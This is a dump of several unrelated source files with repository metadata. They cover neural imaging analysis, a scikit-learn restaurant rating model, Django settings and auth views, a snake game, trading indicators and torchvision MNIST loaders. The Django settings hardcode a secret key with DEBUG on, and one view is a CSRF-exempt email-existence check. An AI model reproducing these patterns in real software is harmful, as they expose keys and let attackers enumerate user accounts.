            left=pos[1][0]*patch_width;
            right=min(left+patch_width, dims[1]);
            unique_pix_temp, M = search_superpixel_in_range((connect_mat_1.reshape(dims[0],int(dims[1]/num_plane),num_plane,order="F"))[up:down,left:right], permute_col, c_ini);
            pure_pix_temp = fast_sep_nmf(M, M.shape[1], residual_cut[ii]);
            if len(pure_pix_temp)>0:
                pure_pix = np.hstack((pure_pix, unique_pix_temp[pure_pix_temp]));
        pure_pix = np.unique(pure_pix);
        print("time: " + str(time.time()-start));
        start = time.time();
        print("prepare iteration!")
        if ii > 0:
            # Append the new components to those from earlier passes.
            a_ini, c_ini, brightness_rank = prepare_iteration(Yd_res, connect_mat_1, permute_col, pure_pix, a_ini, c_ini);
            a = np.hstack((a, a_ini));
            c = np.hstack((c, c_ini));
        else:
            a, c, b, normalize_factor, brightness_rank = prepare_iteration(Yd, connect_mat_1, permute_col, pure_pix, a_ini, c_ini, more=True);
        print("time: " + str(time.time()-start));
        if plot_en:
            Cnt = local_correlations_fft(Yt);
            pure_superpixel_corr_compare_plot(connect_mat_1, unique_pix, pure_pix, brightness_rank_sup, brightness_rank, Cnt, text);
        print("start " + str(ii+1) + " pass iteration!")
        # Final pass gets the longer iteration budget.
        if ii == pass_num - 1:
            maxiter = max_iter_fin;
        else:
            maxiter=max_iter;
        start = time.time();
        if bg:
            a, c, b, fb, ff, res, corr_img_all_r, num_list = update_AC_bg_l2_Y(Yd.reshape(np.prod(dims),-1,order="F"), normalize_factor, a, c, b, ff, fb, dims,
                                        corr_th_fix, maxiter=maxiter, tol=1e-8, update_after=update_after,
                                        merge_corr_thr=merge_corr_thr,merge_overlap_thr=merge_overlap_thr, num_plane=num_plane, plot_en=plot_en, max_allow_neuron_size=max_allow_neuron_size);
        else:
            a, c, b, fb, ff, res, corr_img_all_r, num_list = update_AC_l2_Y(Yd.reshape(np.prod(dims),-1,order="F"), normalize_factor, a, c, b, dims,
                                        corr_th_fix, maxiter=maxiter, tol=1e-8, update_after=update_after,
                                        merge_corr_thr=merge_corr_thr,merge_overlap_thr=merge_overlap_thr, num_plane=num_plane, plot_en=plot_en, max_allow_neuron_size=max_allow_neuron_size);
        print("time: " + str(time.time()-start));
        superpixel_rlt.append({'connect_mat_1':connect_mat_1, 'pure_pix':pure_pix, 'unique_pix':unique_pix, 'brightness_rank':brightness_rank, 'brightness_rank_sup':brightness_rank_sup});
        if pass_num > 1 and ii == 0:
            # Snapshot the first-pass result so it can be returned alongside
            # the final one (and plotted against it below).
            rlt = {'a':a, 'c':c, 'b':b, "fb":fb, "ff":ff, 'res':res, 'corr_img_all_r':corr_img_all_r, 'num_list':num_list};
            a0 = a.copy();
        ii = ii+1;
    # Optional trend-filter denoising of the temporal traces.
    c_tf = [];
    start = time.time();
    if TF:
        sigma = noise_estimator(c.T);
        sigma *= fudge_factor
        for ii in range(c.shape[1]):
            c_tf = np.hstack((c_tf, l1_tf(c[:,ii], sigma[ii])));
        c_tf = c_tf.reshape(T,int(c_tf.shape[0]/T),order="F");
    print("time: " + str(time.time()-start));
    if plot_en:
        if pass_num > 1:
            spatial_sum_plot(a0, a, dims, num_list, text);
        Yd_res = reconstruct(Yd, a, c, b);
        Yd_res = threshold_data(Yd_res, th=0);
        Cnt = local_correlations_fft(Yd_res);
        scale = np.maximum(1, int(Cnt.shape[1]/Cnt.shape[0]));
        plt.figure(figsize=(8*scale,8))
        ax1 = plt.subplot(1,1,1);
        show_img(ax1, Cnt);
        ax1.set(title="Local mean correlation for residual")
        ax1.title.set_fontsize(15)
        ax1.title.set_fontweight("bold")
        plt.show();
    fin_rlt = {'a':a, 'c':c, 'c_tf':c_tf, 'b':b, "fb":fb, "ff":ff, 'res':res, 'corr_img_all_r':corr_img_all_r, 'num_list':num_list};
    # Undo the in-place minimum subtraction applied at the top.
    if Yd_min < 0:
        Yd += Yd_min_pw;
    if pass_num > 1:
        return {'rlt':rlt, 'fin_rlt':fin_rlt, "superpixel_rlt":superpixel_rlt}
    else:
        return {'fin_rlt':fin_rlt, "superpixel_rlt":superpixel_rlt}
| [
"weiz@janelia.hhmi.org"
] | weiz@janelia.hhmi.org |
43effd84e91ca0c4c88ea8cc978acb294c5414fe | aaa9a0b1d11557c8bbe5d7ebfb55267235a61594 | /model.py | 2f4fc7c716e3b1741628a6c32b5e20866e1fa46c | [] | no_license | Vamsitej/Zomato-Restaurant-Rating-Prediction-Flask---Swagger-and-Deployment-using-Heroku | f4111ae213b14de92d17f2bb03b86ee3dc3e3241 | c73249a92c3aae85b45d4bac24d30cccd38d51f2 | refs/heads/main | 2023-05-07T15:47:18.454720 | 2021-05-16T13:10:25 | 2021-05-16T13:10:25 | 367,309,352 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 854 | py |
import pandas as pd
import numpy as np
from sklearn.ensemble import ExtraTreesRegressor
from sklearn.model_selection import train_test_split
import warnings
warnings.filterwarnings('ignore')
df=pd.read_csv('zomato_df.csv')
df.drop('Unnamed: 0',axis=1,inplace=True)
print(df.isna().sum())
x=df.drop('rate',axis=1)
y=df['rate']
x_train,x_test,y_train,y_test=train_test_split(x,y,test_size=.3,random_state=10)
#Preparing Extra Tree Regression
from sklearn.ensemble import ExtraTreesRegressor
ET_Model=ExtraTreesRegressor(n_estimators = 120)
ET_Model.fit(x_train,y_train)
y_predict=ET_Model.predict(x_test)
import pickle
# # Saving model to disk
# pickle.dump(ET_Model, open('model.pkl','wb'))
pickle_out = open("model.pkl","wb")
pickle.dump(ET_Model, pickle_out)
pickle_out.close()
# model=pickle.load(open('model.pkl','rb'))
# print(y_predict)
| [
"gadivemulavamsitej007@gmail.com"
] | gadivemulavamsitej007@gmail.com |
f18905a92d46043feb41644ae7778a517445ada8 | cdfaf1c0cee3071d3338488ff522a0fb4033599a | /mysite/settings.py | b671bbee005689179e44911bba886ebbe8ee2c2d | [] | no_license | PashaLisovchenko/mysite | bf9e84c7812da7b89755d3006750635a07746a18 | 01ec7c792607b7e31d91fa85853249680924fb44 | refs/heads/master | 2021-09-05T01:31:03.839726 | 2018-01-23T12:34:55 | 2018-01-23T12:34:55 | 107,396,267 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,549 | py | """
Django settings for mysite project.
Generated by 'django-admin startproject' using Django 1.11.6.
For more information on this file, see
https://docs.djangoproject.com/en/1.11/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/1.11/ref/settings/
"""
import os
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/1.11/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = 'dh2wd4o$_99b51nuz@(84(*2u(qpqdt0x02hrzr028djd)&!)k'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = ['testlibr.com',]
AUTH_USER_MODEL = 'accounts.User'
# Application definition
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
# my application
'books',
'django_extensions',
'accounts',
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'mysite.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'mysite.wsgi.application'
# Database
# https://docs.djangoproject.com/en/1.11/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
}
}
# Password validation
# https://docs.djangoproject.com/en/1.11/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/1.11/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/1.11/howto/static-files/
STATIC_URL = '/static/'
STATIC_ROOT = os.path.join(BASE_DIR, 'static/')
MEDIA_URL = '/media/'
MEDIA_ROOT = os.path.join(
BASE_DIR, "media")
CELERY_BROKER_URL = 'redis://'
CELERY_RESULT_BACKEND = 'redis://'
CELERY_TIMEZONE = 'UTC'
# CELERYBEAT_SCEDULE = 'mytask': {
# 'task': '',
# 'schedule': timedelta(seconds=5),
# 'args': (16, )
# } | [
"lisovchenko.pasha@gmail.com"
] | lisovchenko.pasha@gmail.com |
fb58449531e8d4d38e17ea8628b285f48a6c86ad | 321b4ed83b6874eeb512027eaa0b17b0daf3c289 | /153/153.find-minimum-in-rotated-sorted-array.250607228.Accepted.leetcode.py | 86c48a645e1a8abbc02eb311cb58e81777442548 | [] | no_license | huangyingw/submissions | 7a610613bdb03f1223cdec5f6ccc4391149ca618 | bfac1238ecef8b03e54842b852f6fec111abedfa | refs/heads/master | 2023-07-25T09:56:46.814504 | 2023-07-16T07:38:36 | 2023-07-16T07:38:36 | 143,352,065 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 378 | py | class Solution(object):
def findMin(self, nums):
if nums[0] <= nums[-1]:
return nums[0]
left, right = 0, len(nums) - 1
while left + 1 < right:
mid = (left + right) // 2
if nums[left] >= nums[mid]:
right = mid
else:
left = mid
return min(nums[left], nums[right])
| [
"huangyingw@gmail.com"
] | huangyingw@gmail.com |
3eb0e9fa1f61b75f5ea76aa43ee046b312b36491 | 107a71aa43cdb5131ff9c40f792c13467bfe1ccd | /login_and_registration_app/views.py | 1e6810d8d4970c91b57935aa042e048a865652d4 | [] | no_license | Shifty-eyed-llama/time_keeper | 84fb43b9886619e6e9ac1fb8b531a73c0a35cc05 | e27df4250728ff85ebe4531d8701c0f9c14c8c75 | refs/heads/master | 2022-11-23T03:52:31.679136 | 2020-07-31T22:01:33 | 2020-07-31T22:01:33 | 283,028,969 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 1,977 | py | from django.shortcuts import render, redirect, HttpResponse
from django.contrib import messages
from .models import *
import bcrypt
from django.views.decorators.csrf import csrf_exempt
from django.http import HttpResponse, HttpResponseRedirect
# Create your views here.
def index(request):
return render(request, 'index.html')
def registration(request):
firstName = request.POST['firstName']
lastName = request.POST['lastName']
email = request.POST['email']
password = request.POST['password']
pw_hash = bcrypt.hashpw(password.encode(), bcrypt.gensalt()).decode()
print(pw_hash)
errors = User.objects.validator_register(request.POST)
if len(errors) > 0:
for key, value in errors.items():
messages.error(request, value)
return redirect('/')
else:
user = User.objects.create(firstName=firstName, lastName=lastName, email=email, password=pw_hash)
request.session['userid'] = user.id
return redirect('/dashboard')
def login(request):
email = request.POST['email']
password = request.POST['password']
user = User.objects.filter(email=request.POST['email'])
errors = User.objects.validator_login(request.POST)
if len(errors) > 0:
for key, value in errors.items():
messages.error(request, value)
return redirect('/')
elif user:
logged_user = user[0]
if bcrypt.checkpw(password.encode(), logged_user.password.encode()):
request.session['userid'] = logged_user.id
return redirect('/dashboard')
else:
messages.error(request, "Invalid password")
return redirect('/')
def endSession(request):
del request.session['userid']
return redirect('/')
@csrf_exempt
def check_email_exists(request):
email=request.POST.get("email")
user_obj=User.objects.filter(email=email)
if user_obj:
return HttpResponse(True)
else:
return HttpResponse(False) | [
"emtbirch@gmail.com"
] | emtbirch@gmail.com |
5a8ca51af55cb939c4bc1b5781854fd3bd43364d | 9d4477d7f56fa7dda9156fc5eee5ab117213c0a8 | /django_novel/urls.py | a5f29ecabe545b24260da61b1fa42803d30c4261 | [] | no_license | liuyuan119/django_novel | 8aa59ea8de8233331bfa05241999485f2dbef51d | d1555d0a17e6e84062948343f535f1bba1971114 | refs/heads/master | 2020-03-18T23:03:10.602765 | 2018-05-30T03:08:57 | 2018-05-30T03:08:57 | 135,380,442 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 965 | py | """p_django_tmall URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/2.0/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: path('', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.urls import include, path
2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))
"""
from django.conf.urls import url, include
from django.contrib import admin
urlpatterns = [
url('admin/', admin.site.urls),
url(r'^art/', include('art.urls')),
# url('account/', include('auth01.urls')),
# url('day4_28/', include('day4_28.urls')),
# url(r'^$', views.index),
# url('', views.get_cate)
]
| [
"1120793140@qq.com"
] | 1120793140@qq.com |
6a77109c6aa14b0e717e99865a97ceffd8cda1c1 | 09e5ce9673590f7ca27c480da605199a6d054a63 | /modules/highscore.py | 3daff9734d8b6c7a31ec3c42d9c75b6f9f816fd8 | [] | no_license | KirillMysnik/PySnake | 781d7767cbb404033b608d15427e9e7996cc71d6 | 3fe1edc20248f20029413a31d88f673411374faf | refs/heads/master | 2021-01-13T09:46:00.622694 | 2016-09-28T14:52:14 | 2016-09-28T14:52:14 | 69,473,624 | 1 | 1 | null | null | null | null | UTF-8 | Python | false | false | 1,698 | py | from modules.delays import Delay
from modules.gui import TextLabel
from internal_events import InternalEvent
LABEL_COLOR = (255, 255, 255)
HIGHSCORE_LABEL_CAPTION = "score: {score}"
HIGHSCORE_LABEL_X = 64
HIGHSCORE_LABEL_Y = 64
TIME_LABEL_CAPTION = "elapsed: {seconds}s"
TIME_LABEL_X = 64
TIME_LABEL_Y = 100
app_ = None
highscore_label = None
time_label = None
highscore = 0
time_ = 0
time_delay = None
def update_time():
global time_, time_delay
time_ += 1
time_label.caption = TIME_LABEL_CAPTION.format(seconds=time_)
time_label.render()
time_delay = Delay(1, update_time)
@InternalEvent('load')
def on_load(app):
global app_, highscore_label, time_label
app_ = app
highscore_label = TextLabel(
HIGHSCORE_LABEL_X, HIGHSCORE_LABEL_Y,
HIGHSCORE_LABEL_CAPTION.format(score=0), 48, LABEL_COLOR,
caption_bold=True)
highscore_label.render()
time_label = TextLabel(
TIME_LABEL_X, TIME_LABEL_Y, TIME_LABEL_CAPTION.format(seconds=0),
32, LABEL_COLOR)
time_label.render()
app_.register_drawer('score', highscore_label.draw)
app_.register_drawer('score', time_label.draw)
@InternalEvent('fruit_eaten')
def on_game_start(fruit):
global highscore
highscore += 1
highscore_label.caption = HIGHSCORE_LABEL_CAPTION.format(score=highscore)
highscore_label.render()
@InternalEvent('game_start')
def on_game_end():
global highscore, time_, time_delay
highscore = 0
time_ = -1
highscore_label.caption = HIGHSCORE_LABEL_CAPTION.format(score=highscore)
highscore_label.render()
update_time()
@InternalEvent('game_end')
def on_game_end():
time_delay.cancel()
| [
"kirill@mysnik.com"
] | kirill@mysnik.com |
a3c84c720bb0bc8a3ec2921c600f975aaed6f1b8 | 20b4be7df5efeb8019356659c5d054f29f450aa1 | /tools/indicators/build_indicators.py | 16a8d1caeb8619580fb4836cc6c8c4cbb50269bb | [
"Apache-2.0"
] | permissive | kumars99/TradzQAI | 75c4138e30796573d67a5f08d9674c1488feb8e4 | 1551321642b6749d9cf26caf2e822051a105b1a5 | refs/heads/master | 2020-03-29T20:14:45.562143 | 2018-09-25T16:07:21 | 2018-09-25T16:07:21 | 150,302,554 | 1 | 0 | null | 2018-09-25T17:17:54 | 2018-09-25T17:17:54 | null | UTF-8 | Python | false | false | 3,553 | py | import pandas as pd
from tools.indicators.exponential_moving_average import exponential_moving_average as ema
from tools.indicators.volatility import volatility as vol
from tools.indicators.stochastic import percent_k as K
from tools.indicators.stochastic import percent_d as D
from tools.indicators.relative_strength_index import relative_strength_index as RSI
from tools.indicators.moving_average_convergence_divergence import moving_average_convergence_divergence as macd
from tools.indicators.bollinger_bands import bandwidth as bb
class Indicators():
def __init__(self, settings=None):
self.bb_period = 20
self.rsi_period = 14
self.sd_period = 0
self.sv_period = 0
self.stoch_period = 14
self.volatility_period = 20
self.macd_long = 24
self.macd_short = 12
self.ema_periods = [20, 50, 100]
self.settings = settings
self.build_func = None
self.names = []
def add_building(self, settings=None):
if settings:
self.settings = settings
if self.settings:
self.build_func = []
for key, value in self.settings.items():
if not value:
continue
elif "RSI" == key and value:
self.names.append('RSI')
if 'default' != value:
self.rsi_period = value
self.build_func.append([RSI, 'RSI', self.rsi_period])
elif "MACD" == key and value:
self.names.append('MACD')
if 'default' != value:
self.macd_long = value[1],
self.macd_short = value[0]
self.build_func.append([macd, 'MACD', [self.macd_short, self.macd_long]])
elif "Volatility" == key and value:
self.names.append('Volatility')
if 'default' != value:
self.volatility_period = value
self.build_func.append([vol, 'Volatility', self.volatility_period])
elif "EMA" == key and value:
if 'default' != value:
for values in value:
self.names.append('EMA'+str(values))
self.build_func.append([ema, 'EMA'+str(values), values])
elif "Bollinger_bands" == key and value:
self.names.append('Bollinger_bands')
if 'default' != value:
self.bb_period = value
self.build_func.append([bb, 'Bollinger_bands', self.bb_period])
elif "Stochastic" == key and value:
self.names.append('Stochastic_D')
self.names.append('Stochastic_K')
if 'default' != value:
self.stoch_period = value
self.build_func.append([D, 'Stochastic_D', self.stoch_period])
self.build_func.append([K, 'Stochastic_K', self.stoch_period])
def build_indicators(self, data):
if not self.build_func:
raise ValueError("No indicators to build.")
indicators = pd.DataFrame(columns=self.names)
for idx in self.build_func:
print (idx[1])
if "MACD" in idx[1]:
indicators[idx[1]] = idx[0](data, idx[2][0], idx[2][1])
else:
indicators[idx[1]] = idx[0](data, idx[2])
return indicators
| [
"awakeproduction@hotmail.fr"
] | awakeproduction@hotmail.fr |
7f878a0b90f3b3d063d1b8898979bfebb591db65 | 6988ebf00a55f005a9a74922183550b0ff893d6d | /my_torchvision/datasets/mnist.py | 7b727e5edc4bf2281c77221aed8d37392009042e | [
"MIT"
] | permissive | ptklx/segmentation_models.pytorch | 8eb4467cee7f56d1bd4c7d9196cdc7aa6640bf62 | 16c68a7e6bff9644b97f340d67912c4785219818 | refs/heads/master | 2022-11-06T21:21:05.684091 | 2020-06-24T01:40:41 | 2020-06-24T01:40:41 | 274,543,431 | 0 | 0 | MIT | 2020-06-24T01:12:16 | 2020-06-24T01:12:15 | null | UTF-8 | Python | false | false | 21,298 | py | from .vision import VisionDataset
import warnings
from PIL import Image
import os
import os.path
import numpy as np
import torch
import codecs
import string
from .utils import download_url, download_and_extract_archive, extract_archive, \
verify_str_arg
class MNIST(VisionDataset):
"""`MNIST <http://yann.lecun.com/exdb/mnist/>`_ Dataset.
Args:
root (string): Root directory of dataset where ``MNIST/processed/training.pt``
and ``MNIST/processed/test.pt`` exist.
train (bool, optional): If True, creates dataset from ``training.pt``,
otherwise from ``test.pt``.
download (bool, optional): If true, downloads the dataset from the internet and
puts it in root directory. If dataset is already downloaded, it is not
downloaded again.
transform (callable, optional): A function/transform that takes in an PIL image
and returns a transformed version. E.g, ``transforms.RandomCrop``
target_transform (callable, optional): A function/transform that takes in the
target and transforms it.
"""
resources = [
("http://yann.lecun.com/exdb/mnist/train-images-idx3-ubyte.gz", "f68b3c2dcbeaaa9fbdd348bbdeb94873"),
("http://yann.lecun.com/exdb/mnist/train-labels-idx1-ubyte.gz", "d53e105ee54ea40749a09fcbcd1e9432"),
("http://yann.lecun.com/exdb/mnist/t10k-images-idx3-ubyte.gz", "9fb629c4189551a2d022fa330f9573f3"),
("http://yann.lecun.com/exdb/mnist/t10k-labels-idx1-ubyte.gz", "ec29112dd5afa0611ce80d1b7f02629c")
]
training_file = 'training.pt'
test_file = 'test.pt'
classes = ['0 - zero', '1 - one', '2 - two', '3 - three', '4 - four',
'5 - five', '6 - six', '7 - seven', '8 - eight', '9 - nine']
@property
def train_labels(self):
warnings.warn("train_labels has been renamed targets")
return self.targets
@property
def test_labels(self):
warnings.warn("test_labels has been renamed targets")
return self.targets
@property
def train_data(self):
warnings.warn("train_data has been renamed data")
return self.data
@property
def test_data(self):
warnings.warn("test_data has been renamed data")
return self.data
def __init__(self, root, train=True, transform=None, target_transform=None,
download=False):
super(MNIST, self).__init__(root, transform=transform,
target_transform=target_transform)
self.train = train # training set or test set
if download:
self.download()
if not self._check_exists():
raise RuntimeError('Dataset not found.' +
' You can use download=True to download it')
if self.train:
data_file = self.training_file
else:
data_file = self.test_file
self.data, self.targets = torch.load(os.path.join(self.processed_folder, data_file))
def __getitem__(self, index):
"""
Args:
index (int): Index
Returns:
tuple: (image, target) where target is index of the target class.
"""
img, target = self.data[index], int(self.targets[index])
# doing this so that it is consistent with all other datasets
# to return a PIL Image
img = Image.fromarray(img.numpy(), mode='L')
if self.transform is not None:
img = self.transform(img)
if self.target_transform is not None:
target = self.target_transform(target)
return img, target
def __len__(self):
return len(self.data)
@property
def raw_folder(self):
return os.path.join(self.root, self.__class__.__name__, 'raw')
@property
def processed_folder(self):
return os.path.join(self.root, self.__class__.__name__, 'processed')
@property
def class_to_idx(self):
return {_class: i for i, _class in enumerate(self.classes)}
def _check_exists(self):
return (os.path.exists(os.path.join(self.processed_folder,
self.training_file)) and
os.path.exists(os.path.join(self.processed_folder,
self.test_file)))
def download(self):
"""Download the MNIST data if it doesn't exist in processed_folder already."""
if self._check_exists():
return
os.makedirs(self.raw_folder, exist_ok=True)
os.makedirs(self.processed_folder, exist_ok=True)
# download files
for url, md5 in self.resources:
filename = url.rpartition('/')[2]
download_and_extract_archive(url, download_root=self.raw_folder, filename=filename, md5=md5)
# process and save as torch files
print('Processing...')
training_set = (
read_image_file(os.path.join(self.raw_folder, 'train-images-idx3-ubyte')),
read_label_file(os.path.join(self.raw_folder, 'train-labels-idx1-ubyte'))
)
test_set = (
read_image_file(os.path.join(self.raw_folder, 't10k-images-idx3-ubyte')),
read_label_file(os.path.join(self.raw_folder, 't10k-labels-idx1-ubyte'))
)
with open(os.path.join(self.processed_folder, self.training_file), 'wb') as f:
torch.save(training_set, f)
with open(os.path.join(self.processed_folder, self.test_file), 'wb') as f:
torch.save(test_set, f)
print('Done!')
def extra_repr(self):
return "Split: {}".format("Train" if self.train is True else "Test")
class FashionMNIST(MNIST):
"""`Fashion-MNIST <https://github.com/zalandoresearch/fashion-mnist>`_ Dataset.
Args:
root (string): Root directory of dataset where ``Fashion-MNIST/processed/training.pt``
and ``Fashion-MNIST/processed/test.pt`` exist.
train (bool, optional): If True, creates dataset from ``training.pt``,
otherwise from ``test.pt``.
download (bool, optional): If true, downloads the dataset from the internet and
puts it in root directory. If dataset is already downloaded, it is not
downloaded again.
transform (callable, optional): A function/transform that takes in an PIL image
and returns a transformed version. E.g, ``transforms.RandomCrop``
target_transform (callable, optional): A function/transform that takes in the
target and transforms it.
"""
resources = [
("http://fashion-mnist.s3-website.eu-central-1.amazonaws.com/train-images-idx3-ubyte.gz",
"8d4fb7e6c68d591d4c3dfef9ec88bf0d"),
("http://fashion-mnist.s3-website.eu-central-1.amazonaws.com/train-labels-idx1-ubyte.gz",
"25c81989df183df01b3e8a0aad5dffbe"),
("http://fashion-mnist.s3-website.eu-central-1.amazonaws.com/t10k-images-idx3-ubyte.gz",
"bef4ecab320f06d8554ea6380940ec79"),
("http://fashion-mnist.s3-website.eu-central-1.amazonaws.com/t10k-labels-idx1-ubyte.gz",
"bb300cfdad3c16e7a12a480ee83cd310")
]
classes = ['T-shirt/top', 'Trouser', 'Pullover', 'Dress', 'Coat', 'Sandal',
'Shirt', 'Sneaker', 'Bag', 'Ankle boot']
class KMNIST(MNIST):
"""`Kuzushiji-MNIST <https://github.com/rois-codh/kmnist>`_ Dataset.
Args:
root (string): Root directory of dataset where ``KMNIST/processed/training.pt``
and ``KMNIST/processed/test.pt`` exist.
train (bool, optional): If True, creates dataset from ``training.pt``,
otherwise from ``test.pt``.
download (bool, optional): If true, downloads the dataset from the internet and
puts it in root directory. If dataset is already downloaded, it is not
downloaded again.
transform (callable, optional): A function/transform that takes in an PIL image
and returns a transformed version. E.g, ``transforms.RandomCrop``
target_transform (callable, optional): A function/transform that takes in the
target and transforms it.
"""
resources = [
("http://codh.rois.ac.jp/kmnist/dataset/kmnist/train-images-idx3-ubyte.gz", "bdb82020997e1d708af4cf47b453dcf7"),
("http://codh.rois.ac.jp/kmnist/dataset/kmnist/train-labels-idx1-ubyte.gz", "e144d726b3acfaa3e44228e80efcd344"),
("http://codh.rois.ac.jp/kmnist/dataset/kmnist/t10k-images-idx3-ubyte.gz", "5c965bf0a639b31b8f53240b1b52f4d7"),
("http://codh.rois.ac.jp/kmnist/dataset/kmnist/t10k-labels-idx1-ubyte.gz", "7320c461ea6c1c855c0b718fb2a4b134")
]
classes = ['o', 'ki', 'su', 'tsu', 'na', 'ha', 'ma', 'ya', 're', 'wo']
class EMNIST(MNIST):
"""`EMNIST <https://www.westernsydney.edu.au/bens/home/reproducible_research/emnist>`_ Dataset.
Args:
root (string): Root directory of dataset where ``EMNIST/processed/training.pt``
and ``EMNIST/processed/test.pt`` exist.
split (string): The dataset has 6 different splits: ``byclass``, ``bymerge``,
``balanced``, ``letters``, ``digits`` and ``mnist``. This argument specifies
which one to use.
train (bool, optional): If True, creates dataset from ``training.pt``,
otherwise from ``test.pt``.
download (bool, optional): If true, downloads the dataset from the internet and
puts it in root directory. If dataset is already downloaded, it is not
downloaded again.
transform (callable, optional): A function/transform that takes in an PIL image
and returns a transformed version. E.g, ``transforms.RandomCrop``
target_transform (callable, optional): A function/transform that takes in the
target and transforms it.
"""
# Updated URL from https://www.nist.gov/node/1298471/emnist-dataset since the
# _official_ download link
# https://cloudstor.aarnet.edu.au/plus/s/ZNmuFiuQTqZlu9W/download
# is (currently) unavailable
url = 'http://www.itl.nist.gov/iaui/vip/cs_links/EMNIST/gzip.zip'
md5 = "58c8d27c78d21e728a6bc7b3cc06412e"
splits = ('byclass', 'bymerge', 'balanced', 'letters', 'digits', 'mnist')
# Merged Classes assumes Same structure for both uppercase and lowercase version
_merged_classes = set(['C', 'I', 'J', 'K', 'L', 'M', 'O', 'P', 'S', 'U', 'V', 'W', 'X', 'Y', 'Z'])
_all_classes = set(list(string.digits + string.ascii_letters))
classes_split_dict = {
'byclass': list(_all_classes),
'bymerge': sorted(list(_all_classes - _merged_classes)),
'balanced': sorted(list(_all_classes - _merged_classes)),
'letters': list(string.ascii_lowercase),
'digits': list(string.digits),
'mnist': list(string.digits),
}
def __init__(self, root, split, **kwargs):
self.split = verify_str_arg(split, "split", self.splits)
self.training_file = self._training_file(split)
self.test_file = self._test_file(split)
super(EMNIST, self).__init__(root, **kwargs)
self.classes = self.classes_split_dict[self.split]
@staticmethod
def _training_file(split):
return 'training_{}.pt'.format(split)
@staticmethod
def _test_file(split):
return 'test_{}.pt'.format(split)
def download(self):
"""Download the EMNIST data if it doesn't exist in processed_folder already."""
import shutil
if self._check_exists():
return
os.makedirs(self.raw_folder, exist_ok=True)
os.makedirs(self.processed_folder, exist_ok=True)
# download files
print('Downloading and extracting zip archive')
download_and_extract_archive(self.url, download_root=self.raw_folder, filename="emnist.zip",
remove_finished=True, md5=self.md5)
gzip_folder = os.path.join(self.raw_folder, 'gzip')
for gzip_file in os.listdir(gzip_folder):
if gzip_file.endswith('.gz'):
extract_archive(os.path.join(gzip_folder, gzip_file), gzip_folder)
# process and save as torch files
for split in self.splits:
print('Processing ' + split)
training_set = (
read_image_file(os.path.join(gzip_folder, 'emnist-{}-train-images-idx3-ubyte'.format(split))),
read_label_file(os.path.join(gzip_folder, 'emnist-{}-train-labels-idx1-ubyte'.format(split)))
)
test_set = (
read_image_file(os.path.join(gzip_folder, 'emnist-{}-test-images-idx3-ubyte'.format(split))),
read_label_file(os.path.join(gzip_folder, 'emnist-{}-test-labels-idx1-ubyte'.format(split)))
)
with open(os.path.join(self.processed_folder, self._training_file(split)), 'wb') as f:
torch.save(training_set, f)
with open(os.path.join(self.processed_folder, self._test_file(split)), 'wb') as f:
torch.save(test_set, f)
shutil.rmtree(gzip_folder)
print('Done!')
class QMNIST(MNIST):
"""`QMNIST <https://github.com/facebookresearch/qmnist>`_ Dataset.
Args:
root (string): Root directory of dataset whose ``processed''
subdir contains torch binary files with the datasets.
what (string,optional): Can be 'train', 'test', 'test10k',
'test50k', or 'nist' for respectively the mnist compatible
training set, the 60k qmnist testing set, the 10k qmnist
examples that match the mnist testing set, the 50k
remaining qmnist testing examples, or all the nist
digits. The default is to select 'train' or 'test'
according to the compatibility argument 'train'.
compat (bool,optional): A boolean that says whether the target
for each example is class number (for compatibility with
the MNIST dataloader) or a torch vector containing the
full qmnist information. Default=True.
download (bool, optional): If true, downloads the dataset from
the internet and puts it in root directory. If dataset is
already downloaded, it is not downloaded again.
transform (callable, optional): A function/transform that
takes in an PIL image and returns a transformed
version. E.g, ``transforms.RandomCrop``
target_transform (callable, optional): A function/transform
that takes in the target and transforms it.
train (bool,optional,compatibility): When argument 'what' is
not specified, this boolean decides whether to load the
training set ot the testing set. Default: True.
"""
